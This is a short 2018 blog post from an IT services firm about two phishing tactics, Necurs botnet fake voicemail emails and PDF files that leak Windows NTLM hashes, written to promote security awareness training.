New Tactics in Social Engineering

by | May 11, 2018 | Security | 0 comments

There’s a problem with combating social engineering style cyber-attacks. As soon as you understand all the methods that bad actors use… they develop new ones! But don’t let that fact dissuade you from appreciating the value of Security Awareness Training and proactive staff education. While phishing attacks continue to evolve and change, your firewalls and filters don’t necessarily adapt. According to KnowBe4, traditional email filters have a 10.5% failure rate. Educating your employees is truly the most effective way to fight against social engineering attacks.

KnowBe4 has identified a new technique, used by the world’s largest phishing botnet, which is both ingenious and dangerous. The Necurs botnet controls millions of machines and is used by criminal botmasters. One odd fact about the Necurs botnet is that it does not appear to affect computers that use Russian as a language. (You can make your own topical assumptions based on that information.) Their new social engineering method consists of the network sending out emails that appear to be a legitimate notification of an unanswered call and includes a voicemail. This attachment, which contains an archive file with .URL domain, will not be found by traditional filters. The malicious payload is delivered when the voicemail is accessed, opening a zipped folder in the user’s browser. Would your employees know to avoid strange voicemails for fear of malware?

Another new social engineering tactic is even more nefarious. It doesn’t just deliver a malicious payload – it actually steals access to your organization. This tactic uses the features natively found in the PDF standard to steal NTLM hashes. These hashes are the format in which Windows stores user credentials. What does that mean for you? If you open an affected PDF file, your Windows credentials can be stolen in about 15 seconds. That’s a BIG threat to your organization’s identity perimeter. PDF files are especially threatening since they are so often sent as attachments.  This vulnerability was already known to exist within Office documents, Outlook, Browsers, Windows shortcut files, and shared folders.

Luckily, this weakness was found by an ethical hacker named Assaf Baharav. He proved that two of the most popular PDF readers didn’t prevent the credential threat, and “highly suspects” others are just as vulnerable. He contends that “the best practice here is to follow Microsoft option security enhancement”, in addition to educating employees about the innate risks of certain file types.

These are just two examples. Social engineering tactics are, by their very nature, constantly evolving. As soon as you think you know all of the ways your information could be phished or how your computers could get ransomware, new strategies develop. Continuous Security Awareness Training is vital to stay ahead of those targeting your business. For an evaluation of your security environment, training for your employees, and defensive measures you can take to protect your business, contact Peters & Associates today! Call 630.832.0075 or email – we are happy to help!